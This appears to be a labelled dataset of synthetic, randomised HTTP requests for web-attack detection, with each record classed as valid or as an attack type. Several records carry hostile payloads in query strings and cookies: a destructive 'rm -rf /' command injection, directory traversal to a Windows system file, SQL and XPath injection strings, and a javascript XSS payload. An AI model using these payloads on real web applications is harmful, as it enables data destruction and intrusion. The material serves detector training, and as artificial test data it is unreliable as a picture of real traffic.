If-Range: Sun, 12 Mar 06 11:32:53 UTC
Max-Forwards: 516
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nc=90f0EcDe
Authorization: NTLM YmNubmVodW50RWhJN3hlbXdsc2FhT3Nqbm10d25uZW0xcml1NmhudHZmZQ==
Range: -4
Referer: http://d3fi.cz/tmalwtid/cosmtSk/jrtoLwr.jpg
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/5.3 (X11; U; Linux i386 9.7; ne-em; rv:8.0.2) Gecko/05474046
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 944x565
Via: HTTP/5.0 124.85.119.165, FTP/9.5 www.p48sdNb.js:6559
Transfer-Encoding: htvsne; tDqwoBrt=rtislii
Upgrade: itc/2.5
Warning: 168 www.escbxam.tiff "8trlaregto" "Sat, 10 Nov 07 11:09:25 UTC"
X-Forwarded-For: 44.32.231.105
X-Serial-Number: 4041973045614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29188
Start - Id: 43607
class: OsCommanding
GET /Lz5M3TtoOTWm9/t5Ii2awKNk4EqJJ_z6/HIeZtP/nEUyoscneOvw89eau/HlhomeAZxygcformc/aImjZp95dvHbe2-cs79J.bin?7STHZ4object=%60+rm++++-rf+++++%2F%60&F4iNopenl2E=dreg%5D+y&Lrnheiotfm=emdoctxerh&myrmnatd=mTTa&eeber5arIgKucN=lDo7a&eeSNsswfolmnp4=9914633207&riambrc3bGnft=t6rtaium0hci HTTP/1.1
Host: 27.171.104.56:33
Connection: close
Accept: application/*
Accept-Charset: x-mac-icelandic;q=0.4, iso-8859-6;q=0.4
Accept-Encoding: compress;q=0.7, identity, compress
Accept-Language: t5Ysmeot-t5wn;q=0.5, ycHlwPe-wl, erpraen-i;q=0.0, qetcpi-4xNsvhr, eib-eo
Cache-Control: no-store
Client-ip: 195.121.252.217
Cookie: uprh=btzws;Fo3Asew1haal=seaiexp_Xih ;behmbdoNry=13364;4cdjWzuNwp-0dKT=\openunioneetckha;n6pe=rE';uaulnarj=692905
Date: Tue, 15 Nov 05 06:33:49 UTC
ETag: "rB@M2mpyx3xyuriKo"
Expect: 100-continue
If-Modified-Since: Wed, 08 Mar 06 10:33:54 UTC
If-Match: "25Su71D5UQU-.Vy0"
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: Basic eWFkc1NzOmdhZnI2aWo=
Authorization: eahl oSct=TrhEl
Referer: http://1econlhi.gov/eul8n.dll
User-Agent: fj7rfn1u/1.3
UA-Disp: 212,8757,8
UA-OS: WinNT
Via: HTTP/8.1 www.6tdleord.png, 3.3 245.88.79.245
Transfer-Encoding: compress
Warning: 448 www.ytalnabp.png "stTtwtaaicnT" "Tue, 12 May 09 22:35:50 GMT"
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 43607
Start - Id: 36058
class: PathTransversal
GET /Ynjiaudaroaaddioiusa/nGDctijoZb5sJLXOmqZs/zF4rmYI/i7detnq590Ie/az9a/e9EL258C8e7PD/iyE4vletYKYo6oQEyS.htm?esrbonnle=235217&oyceetrwuSioei=c5SR&-IshutdownZkACN75.-=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&hu3e=aAe HTTP/1.0
Host: www.7Jwc.org
Connection: ufiment
Accept: */*
Accept-Charset: ks_c_5601-1987, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 67.249.93.38
Cookie: orrQsaiu3=mrinnlbxsvcnpfB;isgrT=480840097;JmD8H4mA_4Tshutdown=1939
Cookie2: $Version="79"
Date: Sat, 27 Jun 09 09:09:58 GMT
ETag: W/"uHw4nlcHQ8W74qHyy"
Expect: 100-continue
From: Odatte@nazuaen.net
If-Modified-Since: Tue, 11 Jan 05 15:42:30 GMT
If-Unmodified-Since: Fri, 28 Aug 09 23:14:57 UTC
If-Match: "gmE.laLeS_yOTUER8v"
If-None-Match: *
If-Range: Sat, 20 Feb 10 23:18:38 CET
Max-Forwards: 76
MIME-Version: 5.0
Pragma: De=5idT
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -676,1810-88717,49-
Referer: /lsdhs/5ytkR/Mgxx/wijpbas/wtudda.mpeg
TE: deflate
Trailer: Warning
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 8.8; 0t-zt; rv:1.0.6) Gecko/04391387
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.3 8.9.78.53:22, HTTP/0.0 252.195.190.33
Transfer-Encoding: gzip
Upgrade: ndmi/3.1, iziw/1.4
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36058
Start - Id: 1629
class: Valid
GET /EhEkoiw/E9passthruEenRYGa/hp31UnW_Q5LxcBXAvc/oe/O.uIwse4boot.inipGuEy/kJh0objectKnSZ9/t0faYeuI/uhou/ypbx_jG5qZhGwP/tDhDxal31IoZhDI.gif? HTTP/1.1
Host: www.echiZa.gov
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 81.253.53.155
Cookie: 4telnetkqQ6a=ealsodiv;otsOsendenfaove=aayNtechoacceptys ;5adOkui5osswyh=zrrp)a
Cookie2: $Version="28"
Date: Mon, 27 Dec 04 12:51:30 CET
ETag: W/"CuGxCSQMyn_oqwuxRj"
Expect: npaioltR=woxosVi;saboAm=Lxri
From: S6tD@nser.com
If-Modified-Since: Tue, 09 Oct 07 14:11:59 UTC
If-Unmodified-Since: Sat, 20 Nov 04 21:40:23 CET
If-Match: "X1-p37u-Zao4-RpPrOo"
If-None-Match: *
If-Range: Sun, 30 Jul 06 12:19:55 CET
Max-Forwards: 917
MIME-Version: 7.4
Pragma: 2TTo=re
Proxy-Authorization: i2vGen celiyy=ey4ea
Authorization: Digest cnonce="rte8"
Range: 39456-
Referer: http://www.tele.com/0sneh/wage/tole.asmx
TE: gzip
Trailer: From
User-Agent: stoi6shlo/1.9.5.1
UA-CPU: MIPS
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: t59ya/1.6 113.210.105.133
Transfer-Encoding: identity
Upgrade: eohlOt/4.8, tas2z/6.9, lDeonb/8.6
Warning: 252 www.8uyednec.gif "mHasti" "Sat, 21 Apr 07 05:42:55 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1629
Start - Id: 41970
class: SqlInjection
GET /sR3iYvkg7B0Wq@qhx/mJwodyRoetneanrntCns.dll?7JEP0iframenOa=leo&1eEQ4yfdnw=admino&simetee=3l&lEmm7rcWom=T+&38Agi=92&hktoofar7tkI1t=echouiel%2F4n&pet=1325&ne5No=t_e-rApD1jqD&HiwovoimhDsh=%27select++++customer_phone++%27%7C%7C%27from++++customers+++%27%7C%7C%27where+customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+and++++customer_type%3D1%27%3B&pqii6oaal=76043074&tyt53beeHaesoo6=93 HTTP/1.0
Host: 139.26.93.64
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lrlteo-oTE, ew-tnqE;q=0.6, r9e8x9n-e
Cache-Control: no-store
Client-ip: 124.187.36.33
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="6"
Date: Thu, 21 Jun 07 11:47:30 GMT
ETag: "F6yDl2ELctqx5Q34"
Expect: 100-continue
From: 7SEma7le@snwitHoOk.it
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 1467
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: awzeh4 1EetAatb=raaaa9e
Authorization: NTLM b2lnZ3NvZWhlb2ViSG1sejFuNmd2b2tEZU5zaldha29lcjJtYWVweWhpOHNhOUVs
Range: 991-40833,238399-36
Referer: http://www.srtr.fr/dcacst6g/esbtdp.png
TE: chunked;q=0.0
Trailer: Proxy-Authorization
User-Agent: Lunqbaoievug
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: 1.6 www.peitroe.shtml:3701, FTP/4.9 13.119.176.129
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41970
Start - Id: 23917
class: Valid
GET /Y0aVDQyDg0Z/tFq@NB8LnZYGMUA_/rhon0latnutr/tU0G/soepetn4ctisiierua.css? HTTP/1.1
Host: 211.162.20.10
Connection: iur0ltoe
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish, koi8;q=0.8, big5, x-mac-turkish, koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 16.124.33.245
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="1"
Date: Wed, 17 Nov 04 16:56:20 UTC
ETag: "f90EsG-wdKbXnHnr"
Expect: vxWocenj
From: gptydse@odstynsmus.de
If-Modified-Since: Tue, 13 Jul 04 03:22:46 UTC
If-Unmodified-Since: Sun, 25 Feb 07 07:47:55 UTC
If-Match: *
If-None-Match: "028VRLJ71MkP33pNc"
If-Range: "7N7iNCIAFf2iD4WY"
Max-Forwards: 8684
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM em9ubmFhb2lxczV6bmxyemF5ZE1kekVhZ3JsZWVyekM=
Authorization: Digest algorithm=MD5
Range: 079760-,794-,2-30
Referer: http://elsaalng.fr/iti7c.mpeg
TE: gzip
Trailer: Expect
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 3.3; uo-sa; rv:1.6.2) Gecko/81230797
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 658x4367
Via: FTP/6.7 122.245.184.108:56, 7.0 www.ea87th.html:76
Transfer-Encoding: gzip
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 59.99.49.22
X-Serial-Number: 383867
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23917
Start - Id: 32336
class: Valid
GET /sZE_b8-tj0AeqL/kz-Ng3-3CXW_r4FswtgW/Bx3DiMRI/WseHeiab/dP-mj1cUOXh_525.css?REnc2ie=pc+u%26t%2Fiia+adupdateu&n4etrtaeqehuy=ak%25&ecenitpn8Otbc2=aJB4iCzHpRj HTTP/1.0
Host: 16.42.123.245:80
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-7;q=0.9, cp-936;q=0.9, cp-932;q=0.3, windows-1252
Accept-Encoding: compress, identity;q=0.8, identity;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 44.81.83.243
Cookie: ois=ofIWSlSwbxb;ye8inetts=38;SyaA=8moenrv3auaostf3s
Cookie2: $Version="91"
Date: Fri, 30 Apr 10 14:02:18 UTC
ETag: "7wBQ58KJo_lePfJqRvb"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Sun, 30 Apr 06 13:55:33 GMT
If-Unmodified-Since: Fri, 06 Aug 04 17:27:27 UTC
If-Match: "xfyYytJRc1fZgH_6hnyy"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: "J_31UVfYoAzNr615oU"
Max-Forwards: 253
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Digest nonce
Range: 5394-,21859-42
Referer: http://b6lwalce.net/hemfxsqt/ecmere/ubpfnlp/hqem/t3ianafi.htm
TE: gzip;q=0.0
Trailer: Via
User-Agent: Mozilla/4.3 (Windows; U; Win98 7.5; 1t-hW; rv:5.2.4) Gecko/81340140
UA-CPU: StrongARM
UA-Disp: 5576,9149,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 831x847
Via: 1.1 www.a8Scopro.gif:52015
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 028 12.22.183.75 "TaWSt493r1l" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32336
Start - Id: 24200
class: Valid
GET /VExyOg.shtml?wm=dcota5er&sfglpok6=wnHROW HTTP/1.1
Host: www.esiamuus8.gov:80
Connection: close
Accept: text/*;q=0.4, image/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, compress, gzip, deflate, deflate
Accept-Language: ffxvriB-emi;q=0.0, roCoydea-wk9neEn;q=0.1
Cache-Control: no-store
Client-ip: 65.205.45.106
Cookie: batqhierAsg4vey=OEgsgo3oaoclgdn
Cookie2: $Version="564"
Date: Fri, 05 Oct 07 01:38:06 UTC
ETag: W/"THyqVjnP2h.xzaaGa1"
Expect: t8clbdr
From: vktxen@eejuti.biz
If-Modified-Since: Mon, 20 Mar 06 12:37:11 UTC
If-Unmodified-Since: Thu, 12 Feb 04 10:02:27 CET
If-Match: "JtO_jpn-k2kO7.y5e"
If-None-Match: *
If-Range: "YwaLzbXpwO0-D9JahH"
Max-Forwards: 7
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: Digest nc=E7F8cB3A
Range: 402-8445,86978-05
Referer: http://7mRe35.gov/a9oiers/tecel/b1006dhH/Wlyryt/tVldeo.mdb
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.5 (X11; U; Open BSD i386 9.6; aj-ri; rv:2.0.7) Gecko/65380359
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: identity
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 053808494
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24200
Start - Id: 48237
class: XSS
POST /q@xnUphpLusrMy/qClcStaLTrlKam3/80na2nssdetXleot/fqZ8vgRe7CctNSWr7FaW/7najgnpvhhOleslauaOG/zcat-Una/asEsrzt7e1tiicr/63yptqPqFfRmaild/lr1oieirhsdq/wrZrm_R.shtml? HTTP/1.0
Content-Length: 222
Content-Language: dMdEyat
Content-Encoding: gzip
Content-Location: http://seonenn.be/84st/oint/enu7/s3mne0rh/l3hte0e.mpeg
Content-MD5: ZXUwZHRlcGJ5OTM4aWpjbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 20:59:02 GMT
Last-Modified: Mon, 22 May 06 07:56:17 GMT
Host: 146.35.52.225:80
Connection: pnfvps
Accept: audio/*;q=0.1
Accept-Charset: iso-8859-4
Accept-Encoding: *
Accept-Language: 9eehrdt-Eqre;q=0.6, o9rna6d-li
Cache-Control: no-store
Client-ip: 235.40.205.51
Cookie: fhoOzRcer=<img dynsrc   =  "   javascript:    [alert    ('mabR');]"   >;rsoDe7eta7ke9ow=NrCo;F_XnMxDW=tyqtsX
Cookie2: $Version="6"
Date: Fri, 18 Dec 09 18:11:36 UTC
ETag: W/"O4eyEimQ9o3CUxc2YQhb"
Expect: 100-continue
From: oowkt3et@ea9hioiot.be
If-Modified-Since: Sat, 19 Aug 06 01:03:52 UTC
If-Unmodified-Since: Mon, 15 Nov 04 12:37:16 UTC
If-Match: "Y8atQNEgxsswBuUq_3"
If-None-Match: *
If-Range: Mon, 17 Nov 08 04:48:38 UTC
Max-Forwards: 77
MIME-Version: 3.7
Pragma: ievfa='t2itha0'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic ZXNlZzdwbWg6ZVRrcXRsaA==
Range: -594,-4310,59019-33
Referer: /avswa/hti5yr/a5te/wAnwtneo/tlhodwm.nsf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.9 (Machintosh; U; PPC 3.1; nR-9l; rv:6.0.7) Gecko/78780710
UA-CPU: x86
UA-Disp: 0382,578,16
UA-Color: color32
UA-Pixels: 582x431
Via: IIae/4.2 www.8yhIn.html
Transfer-Encoding: identity
Upgrade: eoa/9.6
Warning: 321 244.248.253.181 "iesqnoutyAsh" "Fri, 04 Feb 05 13:45:57 CET"
X-Serial-Number: 793433345048
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

MlogoApP=4575&b4hm=w;rhavingn&9e=52750&Brcp7jz0dstyle=~ihedie3kerr?&osedk=9&8r6uEaeou8eslmb=h8t21&enrdn1sx1h0ec=58&oani5fsw6eQalu=eA8&R0nqt6wnyrnoid=[https&bueti=2300&5snaimgd9=owherelss \$nkc\e&eeefydcja2I=n

End - Id: 48237
Start - Id: 7644
class: Valid
POST /nGhN-tCTlebfLjNNo/cnuPune9beb6oebt4ar/oetciiOzubeleiv/nlOdsdyshUiiy/ibwet0l4deaMhHfn.mspx? HTTP/1.1
Content-Length: 185
Content-Language: l3lsets1,vaNerl,aR1ca
Content-Encoding: identity
Content-Location: /i3ttt/eokdsoT.jpg
Content-MD5: UGFzMWQzcXVjZm1peHJubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Feb 05 20:25:46 CET
Last-Modified: Mon, 26 Jul 04 23:13:05 UTC
Host: www.tyer4ts.be
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r8t-Ber;q=0.1, cosolNh-iei;q=0.3
Cache-Control: rr='it'
Client-ip: 227.168.88.151
Cookie: nc5wdEkuoct=vmayR_.uN;np6lcraeongw=sniobyte2;iimfpnrlsniNn=e
Cookie2: $Version="895"
Date: Sun, 15 Jun 08 07:16:03 CET
ETag: "sTrqN8Gk8OsLTPg"
Expect: 100-continue
From: pKiyxfx@wcrhasEw.biz
If-Modified-Since: Sat, 25 Nov 06 16:07:51 GMT
If-Unmodified-Since: Mon, 14 Sep 09 06:32:42 UTC
If-Match: *
If-None-Match: "L9kWyOKPSx_-3vTAK_"
If-Range: "Qh1Waxllx6IRWoMy"
Max-Forwards: 07
MIME-Version: 2.4
Pragma: RI=r8
Proxy-Authorization: Basic cjYzcGpzcnM6bGVzZQ==
Authorization: pn0w nodt=m6itaAdN
Range: -7
Referer: /ebpe4ne.txt
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 7.5; yi-lt; rv:0.0.9) Gecko/20386176
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 395x528
Via: 7.6 www.aubnniT.shtml, 2.8 www.ecfheh.jpeg, HTTP/9.7 www.eSheh.gif:1
Transfer-Encoding: gzip
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
X-Serial-Number: 49052110810625678
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

NHqjeunjeuyor=d&lrndmppl=vepe;iat e(:Lam&5pt8r4eas7Heip=eyema&hnitt=7&ioai=iysjctenagdsbFtl&etnual=lFsdLU&hduajk1ghwxT=268&eoRhf3bigf5sd=902525&wxaeerSfIarrhn=276&nnep4ttthS=68307

End - Id: 7644
Start - Id: 10663
class: Valid
GET /Tt4y/ydhnlbgtmtlgty/0lnaimEonia/rK6Gd5@/IXU/qHwQ9nypi/lqiGDts4/wds/iOT9MlG0R/bcGUS/documentOf1catCqKl/sp3lraYor.exe?aqo1a=eo3on+-3ttx2&p0esiO5=%3EnsnHWrmt9co&tyLfr2nnrhtr0=afEuzwgnh%40%7Et2vt&sy=aeprrt&x7JJWjIxp_htpass=6806973&ise7ole=as3bgsound7indm&rcos=OisorsstylecYe&noeo2ltsL=dazOigj&Exsst=%29+ns&tia=6&e9niusei=dcmO8cinvhs3gehlea&oTgsrdetjnsd=n-LgWC5&dTfai3s3SnO=ownrp0tQnraEInmr&eUEdenetanOo=4479 HTTP/1.1
Host: 172.185.73.5
Connection: close
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: iAttic-atiT6, e-5YxtT, tt-V3udoa
Cache-Control: no-store
Client-ip: 182.244.88.200
Cookie: rtga1tyiecnjsng=31276;7xveajnn=trrR;ve1acoigiehFi9=tesfoh]naurnr;irttnto=d0Tatg;sr=e8eceqeec]e)m
Cookie2: $Version="99"
Date: Fri, 09 Jan 09 16:40:45 UTC
ETag: W/"@B6P1z54H8nU4URT_A"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Mon, 17 Mar 08 01:31:17 UTC
If-Unmodified-Since: Mon, 18 Jul 05 07:53:59 CET
If-Match: "ImBMJMxq@_wpkWC@UskV"
If-None-Match: "s1mWzhh_-EUGM.O6pHAw"
If-Range: Fri, 13 Nov 09 03:48:43 CET
Max-Forwards: 917
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Digest nc=FBc2208B
Range: -8461
Referer: http://rszaon.it/g4oxh/myyti/fole/o49olA/tdfsSa.jpg
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.8 (X11; U; Unix 4.4; hh-an; rv:5.1.6) Gecko/79128372
UA-CPU: 68000
UA-Disp: 167,112,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 513x4808
Via: 4.6 www.nqmm.png, ca9ys/8.6 www.xwee6rsm.js, 8.1 www.dsisy.htm
Transfer-Encoding: compress
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 023 www.sra3ah.tiff "rNeeectgdi9es1dadh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10663
Start - Id: 49896
class: XPathInjection
GET /iY3xs_Rn/l6fgeDpxxU1fOInv@um/Ar9hgmda6/tAd@TKuOEfq3/sSj5y/Ausame4seX7Osui5.css?dtssanaoa6=7798292362&s1eHO8w=dwrtha5swhfkeeih&atS2siteab5og=grdca%27++++or++++%28i++++%3C+count%28gS9a9n%2Fchild%3A%3Atext%28%29%29+and+j++%3C+++count%28Hnvt%2Fchild%3A%3Acomment%28%29%29++++and+k+%3C++++count%28irna%2Fchild%3A%3A*%29+++++%29+++++or+++%27sr5rpmz%27++%3D++%27+++pnne0%27++or&ML6htpass3=efn&bN8qTu=9714168&rrwera=312&geqamxw=3m-RNQl5sKPZ&dljjredaa9=7588&aresscolo=ixawinntz&OTdtGVuprocessing-instructionCw=44080&ntssd1shedsi=t+2Alsi5eshutdownfonthttps&lcafo0rm=o%3F5ntt6g1wo%24all%7Eti&ezodi0piy=0174480 HTTP/1.0
Host: www.iogtl.net
Connection: close
Accept: video/mpeg, image/png;q=0.7
Accept-Charset: euc-tw, windows-1254;q=0.4, windows-1254;q=0.6
Accept-Encoding: 
Accept-Language: rtcsg-swA, we-w;q=0.9, dtid-gtp8s
Cache-Control: max-age=459
Client-ip: 30.98.150.84
Cookie: 2e=rigooklE;hpHcioe4t=jrcGo_;aexno3u2is=uns4bno;lp=6811;twsif=N
Cookie2: $Version="491"
Date: Sun, 13 Jun 04 03:40:50 GMT
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Fri, 11 Jul 08 13:21:51 CET
If-Unmodified-Since: Thu, 28 Jan 10 09:29:12 GMT
If-Match: *
If-None-Match: "Qh.rIkOM9jWL_2anXt3"
If-Range: Wed, 29 Mar 06 17:05:10 UTC
Max-Forwards: 9
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://www.ntiinn.org/tnetie/eaeohpz/hhnr/am4nta/Boar.ace
Range: 794-
Referer: /iyioBt2H.aspx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 1.0; ir-BN; rv:8.5.8) Gecko/21841707
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 8.8 www.iaaR.jpeg:18
Transfer-Encoding: compress
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49896
Start - Id: 3278
class: Valid
GET /3zgt/ecn/lgwdOd0BsQjy.jIDo5/sh/oEeftnhajehol/eHcNdVjJ/e2uSxkJZBlas/e6SvJ/n6taibtuaathhunIs/eytsm74ot/lrGqvnt/btmpdnservicesIw9J.php3?st=o3ncZ7t1igntnc0etk&HpBn=%5Cibraswindow.open+ocypositioni%5CgAt&1RoooiadjwYgrR=location&nheoeeondemscs=Nc87+%27echoeh&2rdewexaraf7=75&nhuhooPliht5o=xmllrvbscript&bamedfuh=p%25 HTTP/1.1
Host: 165.132.67.120
Connection: keep-alive
Accept: text/*, video/*;q=0.9
Accept-Charset: x-mac-chinesetrad, cp-932;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: min-fresh=238
Client-ip: 107.185.188.2
Cookie: idehaLdaltaL=taLod
Cookie2: $Version="0"
Date: Sun, 14 Aug 05 19:15:56 UTC
ETag: "9PrImSBZe4X5jEOd"
Expect: 100-continue
From: oeGnssi@vrp9apa.fr
If-Modified-Since: Wed, 29 Nov 06 21:42:06 GMT
If-Unmodified-Since: Sat, 13 Mar 04 05:16:36 CET
If-Match: *
If-None-Match: "5Hr7bc0IgJofQLo"
If-Range: "mLrFSZ-JXafMOJq1Cm"
Max-Forwards: 6
MIME-Version: 7.1
Pragma: ssPehdt=dPeI
Proxy-Authorization: Basic dGVhWWFpZWE6ZW94MHQ=
Authorization: Digest username="aceaNat"
Range: 0134-966096
Referer: /naoiweso.cfm
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/0.0 (X11; U; Linux i386 1.5; ni-yd; rv:7.8.7) Gecko/10980075
UA-CPU: PowerPC
UA-Disp: 032,9401,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 796x812
Via: FTP/2.7 157.0.192.85, iPlrgt/1.7 www.pMpe.css
Transfer-Encoding: identity
Upgrade: xftiy/9.7, aNte/0.5, ygm5/4.7, hbosrH/1.6
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 826586
----: --------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 3278
Start - Id: 45932
class: PathTransversal
GET /H2xgcatvCaFz4cyfrom/9V-q@NihFvqY0d4SvZ/eiudsd/mrnKnejIh/fHKIMRo.shtml?BGvMSLugAsT=stdinist%3Af&McJ9pKJRT=30882&oet76ysPtymrmer=029056&ii=sgStETerer&5nullIkuq_Y7=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&tpefEz7o=23284385&FJISchild-5.=Eet&oa7=tF7w&82el49Iea3Orats=wk4nsbwgWegecnhpo&CnHkCX=538895451&ebaM7yhit=onNa8&odxe=45337111 HTTP/1.1
Host: www.tnide.net
Connection: close
Accept: image/jpeg;q=0.6, application/*, audio/*
Accept-Charset: utf-7;q=0.1, euc-jp;q=0.7, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=85749
Cookie2: $Version="239"
Date: Thu, 08 Oct 09 12:02:01 UTC
ETag: W/"bBIrbf56@-edjd3B"
Expect: o0drmoa
From: oeeo@awOyreEpb3.st
If-Modified-Since: Thu, 25 Mar 10 10:19:39 CET
If-None-Match: "pCV7_RHQnEZ3Wfi"
Max-Forwards: 250
Pragma: r8Oe='ain'
Authorization: iIeSh h5Sth=uuge
Referer: http://huuasut.st/qetqaros/wi5Nqo/Neifo.dll
User-Agent: dcn9rwase (jm8LShO; ojw13y@)
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: 7.3 www.atpuag.js, FTP/5.0 248.70.109.20, 5.7 www.zOiTt.css
Transfer-Encoding: telre
Warning: 620 www.godtodAm.js "bowantsa4enlgyhci" "Fri, 16 Oct 09 01:24:43 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

